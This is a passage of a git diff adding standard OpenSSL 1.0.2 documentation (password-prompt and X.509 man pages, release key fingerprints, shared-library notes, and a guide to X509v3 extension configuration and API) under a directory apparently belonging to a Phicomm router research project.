+ 	const char *prompt,int verify);
+
+ int des_read_pw_string(char *buf,int length,const char *prompt,int verify);
+ int des_read_pw(char *buf,char *buff,int size,const char *prompt,int verify);
+
+=head1 DESCRIPTION
+
+The DES library contained a few routines to prompt for passwords.  These
+aren't necessarely dependent on DES, and have therefore become part of the
+UI compatibility library.
+
+des_read_pw() writes the string specified by I<prompt> to standard output
+turns echo off and reads an input string from the terminal.  The string is
+returned in I<buf>, which must have spac for at least I<size> bytes.
+If I<verify> is set, the user is asked for the password twice and unless
+the two copies match, an error is returned.  The second password is stored
+in I<buff>, which must therefore also be at least I<size> bytes.  A return
+code of -1 indicates a system error, 1 failure due to use interaction, and
+0 is success.  All other functions described here use des_read_pw() to do
+the work.
+
+des_read_pw_string() is a variant of des_read_pw() that provides a buffer
+for you if I<verify> is set.
+
+des_read_password() calls des_read_pw() and converts the password to a
+DES key by calling DES_string_to_key(); des_read_2password() operates in
+the same way as des_read_password() except that it generates two keys
+by using the DES_string_to_2key() function.
+
+=head1 NOTES
+
+des_read_pw_string() is available in the MIT Kerberos library as well, and
+is also available under the name EVP_read_pw_string().
+
+=head1 SEE ALSO
+
+L<ui(3)|ui(3)>, L<ui_create(3)|ui_create(3)>
+
+=head1 AUTHOR
+
+Richard Levitte (richard@levitte.org) for the OpenSSL project
+(http://www.openssl.org).
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/x509.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/x509.pod
new file mode 100644
index 0000000..f9e58e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/x509.pod
@@ -0,0 +1,64 @@
+=pod
+
+=head1 NAME
+
+x509 - X.509 certificate handling
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+=head1 DESCRIPTION
+
+A X.509 certificate is a structured grouping of information about
+an individual, a device, or anything one can imagine.  A X.509 CRL
+(certificate revocation list) is a tool to help determine if a
+certificate is still valid.  The exact definition of those can be
+found in the X.509 document from ITU-T, or in RFC3280 from PKIX.
+In OpenSSL, the type X509 is used to express such a certificate, and
+the type X509_CRL is used to express a CRL.
+
+A related structure is a certificate request, defined in PKCS#10 from
+RSA Security, Inc, also reflected in RFC2896.  In OpenSSL, the type
+X509_REQ is used to express such a certificate request.
+
+To handle some complex parts of a certificate, there are the types
+X509_NAME (to express a certificate name), X509_ATTRIBUTE (to express
+a certificate attributes), X509_EXTENSION (to express a certificate
+extension) and a few more.
+
+Finally, there's the supertype X509_INFO, which can contain a CRL, a
+certificate and a corresponding private key.
+
+B<X509_>I<...>, B<d2i_X509_>I<...> and B<i2d_X509_>I<...> handle X.509
+certificates, with some exceptions, shown below.
+
+B<X509_CRL_>I<...>, B<d2i_X509_CRL_>I<...> and B<i2d_X509_CRL_>I<...>
+handle X.509 CRLs.
+
+B<X509_REQ_>I<...>, B<d2i_X509_REQ_>I<...> and B<i2d_X509_REQ_>I<...>
+handle PKCS#10 certificate requests.
+
+B<X509_NAME_>I<...> handle certificate names.
+
+B<X509_ATTRIBUTE_>I<...> handle certificate attributes.
+
+B<X509_EXTENSION_>I<...> handle certificate extensions.
+
+=head1 SEE ALSO
+
+L<X509_NAME_ENTRY_get_object(3)|X509_NAME_ENTRY_get_object(3)>,
+L<X509_NAME_add_entry_by_txt(3)|X509_NAME_add_entry_by_txt(3)>,
+L<X509_NAME_add_entry_by_NID(3)|X509_NAME_add_entry_by_NID(3)>,
+L<X509_NAME_print_ex(3)|X509_NAME_print_ex(3)>,
+L<X509_NAME_new(3)|X509_NAME_new(3)>,
+L<d2i_X509(3)|d2i_X509(3)>,
+L<d2i_X509_ALGOR(3)|d2i_X509_ALGOR(3)>,
+L<d2i_X509_CRL(3)|d2i_X509_CRL(3)>,
+L<d2i_X509_NAME(3)|d2i_X509_NAME(3)>,
+L<d2i_X509_REQ(3)|d2i_X509_REQ(3)>,
+L<d2i_X509_SIG(3)|d2i_X509_SIG(3)>,
+L<crypto(3)|crypto(3)>,
+L<x509v3(3)|x509v3(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/fingerprints.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/fingerprints.txt
new file mode 100644
index 0000000..373e90d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/fingerprints.txt
@@ -0,0 +1,63 @@
+                              Fingerprints
+
+OpenSSL releases are signed with PGP/GnuPG keys.  You can find the
+signatures in separate files in the same location you find the
+distributions themselves.  The normal file name is the same as the
+distribution file, with '.asc' added.  For example, the signature for
+the distribution of OpenSSL 1.0.1h, openssl-1.0.1h.tar.gz, is found in
+the file openssl-1.0.1h.tar.gz.asc.
+
+The following is the list of fingerprints for the keys that are
+currently in use to sign OpenSSL distributions:
+
+pub   1024D/F709453B 2003-10-20
+      Key fingerprint = C4CA B749 C34F 7F4C C04F  DAC9 A7AF 9E78 F709 453B
+uid                  Richard Levitte <richard@levitte.org>
+uid                  Richard Levitte <levitte@openssl.org>
+uid                  Richard Levitte <levitte@lp.se>
+
+pub   2048R/F295C759 1998-12-13
+      Key fingerprint = D0 5D 8C 61 6E 27 E6 60  41 EC B1 B8 D5 7E E5 97
+uid                  Dr S N Henson <shenson@drh-consultancy.demon.co.uk>
+
+pub   4096R/FA40E9E2 2005-03-19
+      Key fingerprint = 6260 5AA4 334A F9F0 DDE5  D349 D357 7507 FA40 E9E2
+uid                  Dr Stephen Henson <shenson@opensslfoundation.com>
+uid                  Dr Stephen Henson <shenson@drh-consultancy.co.uk>
+uid                  Dr Stephen N Henson <steve@openssl.org>
+sub   4096R/8811F530 2005-03-19
+
+pub   1024R/49A563D9 1997-02-24
+      Key fingerprint = 7B 79 19 FA 71 6B 87 25  0E 77 21 E5 52 D9 83 BF
+uid                  Mark Cox <mjc@redhat.com>
+uid                  Mark Cox <mark@awe.com>
+uid                  Mark Cox <mjc@apache.org>
+
+pub   1024R/9C58A66D 1997-04-03
+      Key fingerprint = 13 D0 B8 9D 37 30 C3 ED  AC 9C 24 7D 45 8C 17 67
+uid                  jaenicke@openssl.org
+uid                  Lutz Jaenicke <Lutz.Jaenicke@aet.TU-Cottbus.DE>
+
+pub   1024D/2118CF83 1998-07-13
+      Key fingerprint = 7656 55DE 62E3 96FF 2587  EB6C 4F6D E156 2118 CF83
+uid                  Ben Laurie <ben@thebunker.net>
+uid                  Ben Laurie <ben@cryptix.org>
+uid                  Ben Laurie <ben@algroup.co.uk>
+sub   4096g/1F5143E7 1998-07-13
+
+pub   1024R/5A6A9B85 1994-03-22
+      Key fingerprint = C7 AC 7E AD 56 6A 65 EC  F6 16 66 83 7E 86 68 28
+uid                  Bodo Moeller <2005@bmoeller.de>
+uid                  Bodo Moeller <2003@bmoeller.de>
+uid                  Bodo Moeller <2004@bmoeller.de>
+uid                  Bodo Moeller <bmoeller@acm.org>
+uid                  Bodo Moeller <bodo@openssl.org>
+uid                  Bodo Moeller <bm@ulf.mali.sub.org>
+uid                  Bodo Moeller <3moeller@informatik.uni-hamburg.de>
+uid                  Bodo Moeller <Bodo_Moeller@public.uni-hamburg.de>
+uid                  Bodo Moeller <3moeller@rzdspc5.informatik.uni-hamburg.de>
+
+pub   2048R/0E604491 2013-04-30            
+      Key fingerprint = 8657 ABB2 60F0 56B1 E519 0839 D9C4 D26D 0E60 4491
+uid                  Matt Caswell <frodo@baggins.org>
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl-shared.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl-shared.txt
new file mode 100644
index 0000000..5cf84a0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl-shared.txt
@@ -0,0 +1,32 @@
+The OpenSSL  shared libraries are often installed in a directory like
+/usr/local/ssl/lib.
+
+If this directory is not in a standard system path for dynamic/shared
+libraries, then you will have problems linking and executing
+applications that use OpenSSL libraries UNLESS:
+
+* you link with static (archive) libraries.  If you are truly
+  paranoid about security, you should use static libraries.
+* you use the GNU libtool code during linking
+  (http://www.gnu.org/software/libtool/libtool.html)
+* you use pkg-config during linking (this requires that
+  PKG_CONFIG_PATH includes the path to the OpenSSL shared
+  library directory), and make use of -R or -rpath.
+  (http://www.freedesktop.org/software/pkgconfig/)
+* you specify the system-wide link path via a command such
+  as crle(1) on Solaris systems.
+* you add the OpenSSL shared library directory to /etc/ld.so.conf
+  and run ldconfig(8) on Linux systems.
+* you define the LD_LIBRARY_PATH, LIBPATH, SHLIB_PATH (HP),
+  DYLD_LIBRARY_PATH (MacOS X) or PATH (Cygwin and DJGPP)
+  environment variable and add the OpenSSL shared library
+  directory to it.
+
+One common tool to check the dynamic dependencies of an executable
+or dynamic library is ldd(1) on most UNIX systems.
+
+See any operating system documentation and manpages about shared
+libraries for your version of UNIX.  The following manpages may be
+helpful: ld(1), ld.so(1), ld.so.1(1) [Solaris], dld.sl(1) [HP],
+ldd(1), crle(1) [Solaris], pldd(1) [Solaris], ldconfig(8) [Linux],
+chatr(1) [HP].
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl.txt
new file mode 100644
index 0000000..f8817b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl.txt
@@ -0,0 +1,1254 @@
+
+This is some preliminary documentation for OpenSSL.
+
+Contents:
+
+ OpenSSL X509V3 extension configuration
+ X509V3 Extension code: programmers guide
+ PKCS#12 Library
+
+
+==============================================================================
+               OpenSSL X509V3 extension configuration
+==============================================================================
+
+OpenSSL X509V3 extension configuration: preliminary documentation.
+
+INTRODUCTION.
+
+For OpenSSL 0.9.2 the extension code has be considerably enhanced. It is now
+possible to add and print out common X509 V3 certificate and CRL extensions.
+
+BEGINNERS NOTE
+
+For most simple applications you don't need to know too much about extensions:
+the default openssl.cnf values will usually do sensible things.
+
+If you want to know more you can initially quickly look through the sections
+describing how the standard OpenSSL utilities display and add extensions and
+then the list of supported extensions.
+
+For more technical information about the meaning of extensions see:
+
+http://www.imc.org/ietf-pkix/
+http://home.netscape.com/eng/security/certs.html
+
+PRINTING EXTENSIONS.
+
+Extension values are automatically printed out for supported extensions.
+
+openssl x509 -in cert.pem -text
+openssl crl -in crl.pem -text
+
+will give information in the extension printout, for example:
+
+        X509v3 extensions:
+            X509v3 Basic Constraints: 
+                CA:TRUE
+            X509v3 Subject Key Identifier: 
+                73:FE:F7:59:A7:E1:26:84:44:D6:44:36:EE:79:1A:95:7C:B1:4B:15
+            X509v3 Authority Key Identifier: 
+                keyid:73:FE:F7:59:A7:E1:26:84:44:D6:44:36:EE:79:1A:95:7C:B1:4B:15, DirName:/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd/Email=email@1.address/Email=email@2.address, serial:00
+            X509v3 Key Usage: 
+                Certificate Sign, CRL Sign
+            X509v3 Subject Alternative Name: 
+                email:email@1.address, email:email@2.address
+
+CONFIGURATION FILES.
+
+The OpenSSL utilities 'ca' and 'req' can now have extension sections listing
+which certificate extensions to include. In each case a line:
+
+x509_extensions = extension_section
+
+indicates which section contains the extensions. In the case of 'req' the
+extension section is used when the -x509 option is present to create a
+self signed root certificate.
+
+The 'x509' utility also supports extensions when it signs a certificate.
+The -extfile option is used to set the configuration file containing the
+extensions. In this case a line with:
+
+extensions = extension_section
+
+in the nameless (default) section is used. If no such line is included then
+it uses the default section.
+
+You can also add extensions to CRLs: a line
+
+crl_extensions = crl_extension_section
+
+will include extensions when the -gencrl option is used with the 'ca' utility.
+You can add any extension to a CRL but of the supported extensions only
+issuerAltName and authorityKeyIdentifier make any real sense. Note: these are
+CRL extensions NOT CRL *entry* extensions which cannot currently be generated.
+CRL entry extensions can be displayed.
+
+NB. At this time Netscape Communicator rejects V2 CRLs: to get an old V1 CRL
+you should not include a crl_extensions line in the configuration file.
+
+As with all configuration files you can use the inbuilt environment expansion
+to allow the values to be passed in the environment. Therefore if you have
+several extension sections used for different purposes you can have a line:
+
+x509_extensions = $ENV::ENV_EXT
+
+and set the ENV_EXT environment variable before calling the relevant utility.
+
+EXTENSION SYNTAX.
+
+Extensions have the basic form:
+
+extension_name=[critical,] extension_options
+
+the use of the critical option makes the extension critical. Extreme caution
+should be made when using the critical flag. If an extension is marked
+as critical then any client that does not understand the extension should
+reject it as invalid. Some broken software will reject certificates which
+have *any* critical extensions (these violates PKIX but we have to live
+with it).
+
+There are three main types of extension: string extensions, multi-valued
+extensions, and raw extensions.
+
+String extensions simply have a string which contains either the value itself
+or how it is obtained.
+
+For example:
+
+nsComment="This is a Comment"
+
+Multi-valued extensions have a short form and a long form. The short form
+is a list of names and values:
+
+basicConstraints=critical,CA:true,pathlen:1
+
+The long form allows the values to be placed in a separate section:
+
+basicConstraints=critical,@bs_section
+
+[bs_section]
+
+CA=true
+pathlen=1
+
+Both forms are equivalent. However it should be noted that in some cases the
+same name can appear multiple times, for example,
+
+subjectAltName=email:steve@here,email:steve@there
+
+in this case an equivalent long form is:
+
+subjectAltName=@alt_section
+
+[alt_section]
+
+email.1=steve@here
+email.2=steve@there
+
+This is because the configuration file code cannot handle the same name
+occurring twice in the same section.
+
+The syntax of raw extensions is governed by the extension code: it can
+for example contain data in multiple sections. The correct syntax to
+use is defined by the extension code itself: check out the certificate
+policies extension for an example.
+
+There are two ways to encode arbitrary extensions.
+
+The first way is to use the word ASN1 followed by the extension content
+using the same syntax as ASN1_generate_nconf(). For example:
+
+1.2.3.4=critical,ASN1:UTF8String:Some random data
+
+1.2.3.4=ASN1:SEQUENCE:seq_sect
+
+[seq_sect]
+
+field1 = UTF8:field1
+field2 = UTF8:field2
+
+It is also possible to use the word DER to include arbitrary data in any
+extension.
+
+1.2.3.4=critical,DER:01:02:03:04
+1.2.3.4=DER:01020304
+
+The value following DER is a hex dump of the DER encoding of the extension
+Any extension can be placed in this form to override the default behaviour.
+For example:
+
+basicConstraints=critical,DER:00:01:02:03
+
+WARNING: DER should be used with caution. It is possible to create totally
+invalid extensions unless care is taken.
+
+CURRENTLY SUPPORTED EXTENSIONS.
+
+If you aren't sure about extensions then they can be largely ignored: its only
+when you want to do things like restrict certificate usage when you need to
+worry about them. 
+
+The only extension that a beginner might want to look at is Basic Constraints.
+If in addition you want to try Netscape object signing the you should also
+look at Netscape Certificate Type.
+
+Literal String extensions.
+
+In each case the 'value' of the extension is placed directly in the
+extension. Currently supported extensions in this category are: nsBaseUrl,
+nsRevocationUrl, nsCaRevocationUrl, nsRenewalUrl, nsCaPolicyUrl,
+nsSslServerName and nsComment.
+
+For example:
+
+nsComment="This is a test comment"
+
+Bit Strings.
+
+Bit string extensions just consist of a list of supported bits, currently
+two extensions are in this category: PKIX keyUsage and the Netscape specific
+nsCertType.
+
+nsCertType (netscape certificate type) takes the flags: client, server, email,
+objsign, reserved, sslCA, emailCA, objCA.
+
+keyUsage (PKIX key usage) takes the flags: digitalSignature, nonRepudiation,
+keyEncipherment, dataEncipherment, keyAgreement, keyCertSign, cRLSign,
+encipherOnly, decipherOnly.
+
+For example:
+
+nsCertType=server
+
+keyUsage=digitalSignature, nonRepudiation
+
+Hints on Netscape Certificate Type.
+
+Other than Basic Constraints this is the only extension a beginner might
+want to use, if you want to try Netscape object signing, otherwise it can
+be ignored.
+
+If you want a certificate that can be used just for object signing then:
+
+nsCertType=objsign
+
+will do the job. If you want to use it as a normal end user and server
+certificate as well then
+
+nsCertType=objsign,email,server
+
+is more appropriate. You cannot use a self signed certificate for object
+signing (well Netscape signtool can but it cheats!) so you need to create
+a CA certificate and sign an end user certificate with it.
+
+Side note: If you want to conform to the Netscape specifications then you
+should really also set:
+
+nsCertType=objCA
+
+in the *CA* certificate for just an object signing CA and
+
+nsCertType=objCA,emailCA,sslCA
+
+for everything. Current Netscape software doesn't enforce this so it can
+be omitted.
+
+Basic Constraints.
+
+This is generally the only extension you need to worry about for simple
+applications. If you want your certificate to be usable as a CA certificate
+(in addition to an end user certificate) then you set this to:
+
+basicConstraints=CA:TRUE
+
+if you want to be certain the certificate cannot be used as a CA then do:
+
+basicConstraints=CA:FALSE
+
+The rest of this section describes more advanced usage.
+
+Basic constraints is a multi-valued extension that supports a CA and an
+optional pathlen option. The CA option takes the values true and false and
+pathlen takes an integer. Note if the CA option is false the pathlen option
+should be omitted. 
+
+The pathlen parameter indicates the maximum number of CAs that can appear
+below this one in a chain. So if you have a CA with a pathlen of zero it can
+only be used to sign end user certificates and not further CAs. This all
+assumes that the software correctly interprets this extension of course.
+
+Examples:
+
+basicConstraints=CA:TRUE
+basicConstraints=critical,CA:TRUE, pathlen:0
+
+NOTE: for a CA to be considered valid it must have the CA option set to
+TRUE. An end user certificate MUST NOT have the CA value set to true.
+According to PKIX recommendations it should exclude the extension entirely,
+however some software may require CA set to FALSE for end entity certificates.
+
+Extended Key Usage.
+
+This extensions consists of a list of usages.
+
+These can either be object short names of the dotted numerical form of OIDs.
+While any OID can be used only certain values make sense. In particular the
+following PKIX, NS and MS values are meaningful:
+
+Value			Meaning
+-----			-------
+serverAuth		SSL/TLS Web Server Authentication.
+clientAuth		SSL/TLS Web Client Authentication.
+codeSigning		Code signing.
+emailProtection		E-mail Protection (S/MIME).
+timeStamping		Trusted Timestamping
+msCodeInd		Microsoft Individual Code Signing (authenticode)
+msCodeCom		Microsoft Commercial Code Signing (authenticode)
+msCTLSign		Microsoft Trust List Signing
+msSGC			Microsoft Server Gated Crypto
+msEFS			Microsoft Encrypted File System
+nsSGC			Netscape Server Gated Crypto
+
+For example, under IE5 a CA can be used for any purpose: by including a list
+of the above usages the CA can be restricted to only authorised uses.
+
+Note: software packages may place additional interpretations on certificate 
+use, in particular some usages may only work for selected CAs. Don't for example
+expect just including msSGC or nsSGC will automatically mean that a certificate
+can be used for SGC ("step up" encryption) otherwise anyone could use it.
+
+Examples:
+
+extendedKeyUsage=critical,codeSigning,1.2.3.4
+extendedKeyUsage=nsSGC,msSGC
+
+Subject Key Identifier.
+
+This is really a string extension and can take two possible values. Either
+a hex string giving details of the extension value to include or the word
+'hash' which then automatically follow PKIX guidelines in selecting and
+appropriate key identifier. The use of the hex string is strongly discouraged.
+
+Example: subjectKeyIdentifier=hash
+
+Authority Key Identifier.
+
+The authority key identifier extension permits two options. keyid and issuer:
+both can take the optional value "always".
+
+If the keyid option is present an attempt is made to copy the subject key
+identifier from the parent certificate. If the value "always" is present
+then an error is returned if the option fails.
+
+The issuer option copies the issuer and serial number from the issuer
+certificate. Normally this will only be done if the keyid option fails or
+is not included: the "always" flag will always include the value.
+
+Subject Alternative Name.
+
+The subject alternative name extension allows various literal values to be
+included in the configuration file. These include "email" (an email address)
+"URI" a uniform resource indicator, "DNS" (a DNS domain name), RID (a
+registered ID: OBJECT IDENTIFIER), IP (and IP address) and otherName.
+
+Also the email option include a special 'copy' value. This will automatically
+include and email addresses contained in the certificate subject name in
+the extension.
+
+otherName can include arbitrary data associated with an OID: the value
+should be the OID followed by a semicolon and the content in standard
+ASN1_generate_nconf() format.
+
+Examples:
+
+subjectAltName=email:copy,email:my@other.address,URI:http://my.url.here/
+subjectAltName=email:my@other.address,RID:1.2.3.4
+subjectAltName=otherName:1.2.3.4;UTF8:some other identifier
+
+Issuer Alternative Name.
+
+The issuer alternative name option supports all the literal options of
+subject alternative name. It does *not* support the email:copy option because
+that would not make sense. It does support an additional issuer:copy option
+that will copy all the subject alternative name values from the issuer 
+certificate (if possible).
+
+Example:
+
+issuserAltName = issuer:copy
+
+Authority Info Access.
+
+The authority information access extension gives details about how to access
+certain information relating to the CA. Its syntax is accessOID;location
+where 'location' has the same syntax as subject alternative name (except
+that email:copy is not supported). accessOID can be any valid OID but only
+certain values are meaningful for example OCSP and caIssuers. OCSP gives the
+location of an OCSP responder: this is used by Netscape PSM and other software.
+
+Example:
+
+authorityInfoAccess = OCSP;URI:http://ocsp.my.host/
+authorityInfoAccess = caIssuers;URI:http://my.ca/ca.html
+
+CRL distribution points.
+
+This is a multi-valued extension that supports all the literal options of
+subject alternative name. Of the few software packages that currently interpret
+this extension most only interpret the URI option.
+
+Currently each option will set a new DistributionPoint with the fullName
+field set to the given value.
+
+Other fields like cRLissuer and reasons cannot currently be set or displayed:
+at this time no examples were available that used these fields.
+
+If you see this extension with <UNSUPPORTED> when you attempt to print it out
+or it doesn't appear to display correctly then let me know, including the
+certificate (mail me at steve@openssl.org) .
+
+Examples:
+
+crlDistributionPoints=URI:http://www.myhost.com/myca.crl
+crlDistributionPoints=URI:http://www.my.com/my.crl,URI:http://www.oth.com/my.crl
+
+Certificate Policies.
+
+This is a RAW extension. It attempts to display the contents of this extension:
+unfortunately this extension is often improperly encoded.
+
+The certificate policies extension will rarely be used in practice: few
+software packages interpret it correctly or at all. IE5 does partially
+support this extension: but it needs the 'ia5org' option because it will
+only correctly support a broken encoding. Of the options below only the
+policy OID, explicitText and CPS options are displayed with IE5.
+
+All the fields of this extension can be set by using the appropriate syntax.
+
+If you follow the PKIX recommendations of not including any qualifiers and just
+using only one OID then you just include the value of that OID. Multiple OIDs
+can be set separated by commas, for example:
+
+certificatePolicies= 1.2.4.5, 1.1.3.4
+
+If you wish to include qualifiers then the policy OID and qualifiers need to
+be specified in a separate section: this is done by using the @section syntax
+instead of a literal OID value.
+
+The section referred to must include the policy OID using the name
+policyIdentifier, cPSuri qualifiers can be included using the syntax:
+
+CPS.nnn=value
+
+userNotice qualifiers can be set using the syntax:
+
+userNotice.nnn=@notice
+
+The value of the userNotice qualifier is specified in the relevant section.
+This section can include explicitText, organization and noticeNumbers
+options. explicitText and organization are text strings, noticeNumbers is a
+comma separated list of numbers. The organization and noticeNumbers options
+(if included) must BOTH be present. If you use the userNotice option with IE5
+then you need the 'ia5org' option at the top level to modify the encoding:
+otherwise it will not be interpreted properly.
+
+Example:
+
+certificatePolicies=ia5org,1.2.3.4,1.5.6.7.8,@polsect
+
+[polsect]
+
+policyIdentifier = 1.3.5.8
+CPS.1="http://my.host.name/"
+CPS.2="http://my.your.name/"
+userNotice.1=@notice
+
+[notice]
+
+explicitText="Explicit Text Here"
+organization="Organisation Name"
+noticeNumbers=1,2,3,4
+
+TECHNICAL NOTE: the ia5org option changes the type of the 'organization' field,
+according to PKIX it should be of type DisplayText but Verisign uses an 
+IA5STRING and IE5 needs this too.
+
+Display only extensions.
+
+Some extensions are only partially supported and currently are only displayed
+but cannot be set. These include private key usage period, CRL number, and
+CRL reason.
+
+==============================================================================
+		X509V3 Extension code: programmers guide
+==============================================================================
+
+The purpose of the extension code is twofold. It allows an extension to be
+created from a string or structure describing its contents and it prints out an
+extension in a human or machine readable form.
+
+1. Initialisation and cleanup.
+
+No special initialisation is needed before calling the extension functions.
+You used to have to call X509V3_add_standard_extensions(); but this is no longer
+required and this function no longer does anything.
+
+void X509V3_EXT_cleanup(void);
+
+This function should be called to cleanup the extension code if any custom
+extensions have been added. If no custom extensions have been added then this
+call does nothing. After this call all custom extension code is freed up but
+you can still use the standard extensions.
+
+2. Printing and parsing extensions.
+
+The simplest way to print out extensions is via the standard X509 printing
+routines: if you use the standard X509_print() function, the supported
+extensions will be printed out automatically.
+
+The following functions allow finer control over extension display:
+
+int X509V3_EXT_print(BIO *out, X509_EXTENSION *ext, int flag, int indent);
+int X509V3_EXT_print_fp(FILE *out, X509_EXTENSION *ext, int flag, int indent);
+
+These two functions print out an individual extension to a BIO or FILE pointer.
+Currently the flag argument is unused and should be set to 0. The 'indent'
+argument is the number of spaces to indent each line.
+
+void *X509V3_EXT_d2i(X509_EXTENSION *ext);
+
+This function parses an extension and returns its internal structure. The
+precise structure you get back depends on the extension being parsed. If the
+extension if basicConstraints you will get back a pointer to a
+BASIC_CONSTRAINTS structure. Check out the source in crypto/x509v3 for more
+details about the structures returned. The returned structure should be freed
+after use using the relevant free function, BASIC_CONSTRAINTS_free() for 
+example.
+
+void	*	X509_get_ext_d2i(X509 *x, int nid, int *crit, int *idx);
+void	*	X509_CRL_get_ext_d2i(X509_CRL *x, int nid, int *crit, int *idx);
+void	*	X509_REVOKED_get_ext_d2i(X509_REVOKED *x, int nid, int *crit, int *idx);
+void 	*	X509V3_get_d2i(STACK_OF(X509_EXTENSION) *x, int nid, int *crit, int *idx);
+
+These functions combine the operations of searching for extensions and
+parsing them. They search a certificate, a CRL a CRL entry or a stack
+of extensions respectively for extension whose NID is 'nid' and return
+the parsed result of NULL if an error occurred. For example:
+
+BASIC_CONSTRAINTS *bs;
+bs = X509_get_ext_d2i(cert, NID_basic_constraints, NULL, NULL);
+
+This will search for the basicConstraints extension and either return
+it value or NULL. NULL can mean either the extension was not found, it
+occurred more than once or it could not be parsed.
+
+If 'idx' is NULL then an extension is only parsed if it occurs precisely
+once. This is standard behaviour because extensions normally cannot occur
+more than once. If however more than one extension of the same type can
+occur it can be used to parse successive extensions for example:
+
+int i;
+void *ext;
+
+i = -1;
+for(;;) {
+	ext = X509_get_ext_d2i(x, nid, crit, &idx);
+	if(ext == NULL) break;
+	 /* Do something with ext */
+}
+
+If 'crit' is not NULL and the extension was found then the int it points to
+is set to 1 for critical extensions and 0 for non critical. Therefore if the
+function returns NULL but 'crit' is set to 0 or 1 then the extension was
+found but it could not be parsed.
+
+The int pointed to by crit will be set to -1 if the extension was not found
+and -2 if the extension occurred more than once (this will only happen if
+idx is NULL). In both cases the function will return NULL.
+
+3. Generating extensions.
+
+An extension will typically be generated from a configuration file, or some
+other kind of configuration database.
+
+int X509V3_EXT_add_conf(LHASH *conf, X509V3_CTX *ctx, char *section,
+								 X509 *cert);
+int X509V3_EXT_CRL_add_conf(LHASH *conf, X509V3_CTX *ctx, char *section,
+								 X509_CRL *crl);
+
+These functions add all the extensions in the given section to the given
+certificate or CRL. They will normally be called just before the certificate
+or CRL is due to be signed. Both return 0 on error on non zero for success.
+
+In each case 'conf' is the LHASH pointer of the configuration file to use
+and 'section' is the section containing the extension details.
+
+See the 'context functions' section for a description of the ctx parameter.
+
+
+X509_EXTENSION *X509V3_EXT_conf(LHASH *conf, X509V3_CTX *ctx, char *name,
+								 char *value);
+
+This function returns an extension based on a name and value pair, if the
+pair will not need to access other sections in a config file (or there is no
+config file) then the 'conf' parameter can be set to NULL.
+
+X509_EXTENSION *X509V3_EXT_conf_nid(char *conf, X509V3_CTX *ctx, int nid,
+								 char *value);
+
+This function creates an extension in the same way as X509V3_EXT_conf() but
+takes the NID of the extension rather than its name.
+
+For example to produce basicConstraints with the CA flag and a path length of
+10:
+
+x = X509V3_EXT_conf_nid(NULL, NULL, NID_basic_constraints,"CA:TRUE,pathlen:10");
+
+
+X509_EXTENSION *X509V3_EXT_i2d(int ext_nid, int crit, void *ext_struc);
+
+This function sets up an extension from its internal structure. The ext_nid
+parameter is the NID of the extension and 'crit' is the critical flag.
+
+4. Context functions.
+
+The following functions set and manipulate an extension context structure.
+The purpose of the extension context is to allow the extension code to
+access various structures relating to the "environment" of the certificate:
+for example the issuers certificate or the certificate request.
+
+void X509V3_set_ctx(X509V3_CTX *ctx, X509 *issuer, X509 *subject,
+                                 X509_REQ *req, X509_CRL *crl, int flags);
+
+This function sets up an X509V3_CTX structure with details of the certificate
+environment: specifically the issuers certificate, the subject certificate,
+the certificate request and the CRL: if these are not relevant or not
+available then they can be set to NULL. The 'flags' parameter should be set
+to zero.
+
+X509V3_set_ctx_test(ctx)
+
+This macro is used to set the 'ctx' structure to a 'test' value: this is to
+allow the syntax of an extension (or configuration file) to be tested.
+
+X509V3_set_ctx_nodb(ctx)
+
+This macro is used when no configuration database is present.
+
+void X509V3_set_conf_lhash(X509V3_CTX *ctx, LHASH *lhash);
+
+This function is used to set the configuration database when it is an LHASH
+structure: typically a configuration file.
+
+The following functions are used to access a configuration database: they
+should only be used in RAW extensions.
+
+char * X509V3_get_string(X509V3_CTX *ctx, char *name, char *section);
+
+This function returns the value of the parameter "name" in "section", or NULL
+if there has been an error.
+
+void X509V3_string_free(X509V3_CTX *ctx, char *str);
+
+This function frees up the string returned by the above function.
+
+STACK_OF(CONF_VALUE) * X509V3_get_section(X509V3_CTX *ctx, char *section);
+
+This function returns a whole section as a STACK_OF(CONF_VALUE) .
+
+void X509V3_section_free( X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *section);
+
+This function frees up the STACK returned by the above function.
+
+Note: it is possible to use the extension code with a custom configuration
+database. To do this the "db_meth" element of the X509V3_CTX structure should
+be set to an X509V3_CTX_METHOD structure. This structure contains the following
+function pointers:
+
+char * (*get_string)(void *db, char *section, char *value);
+STACK_OF(CONF_VALUE) * (*get_section)(void *db, char *section);
+void (*free_string)(void *db, char * string);
+void (*free_section)(void *db, STACK_OF(CONF_VALUE) *section);
+
+these will be called and passed the 'db' element in the X509V3_CTX structure
+to access the database. If a given function is not implemented or not required
+it can be set to NULL.
+
+5. String helper functions.
+
+There are several "i2s" and "s2i" functions that convert structures to and
+from ASCII strings. In all the "i2s" cases the returned string should be
+freed using Free() after use. Since some of these are part of other extension
+code they may take a 'method' parameter. Unless otherwise stated it can be
+safely set to NULL.
+
+char *i2s_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method, ASN1_OCTET_STRING *oct);
+
+This returns a hex string from an ASN1_OCTET_STRING.
+
+char * i2s_ASN1_INTEGER(X509V3_EXT_METHOD *meth, ASN1_INTEGER *aint);
+char * i2s_ASN1_ENUMERATED(X509V3_EXT_METHOD *meth, ASN1_ENUMERATED *aint);
+
+These return a string decimal representations of an ASN1_INTEGER and an
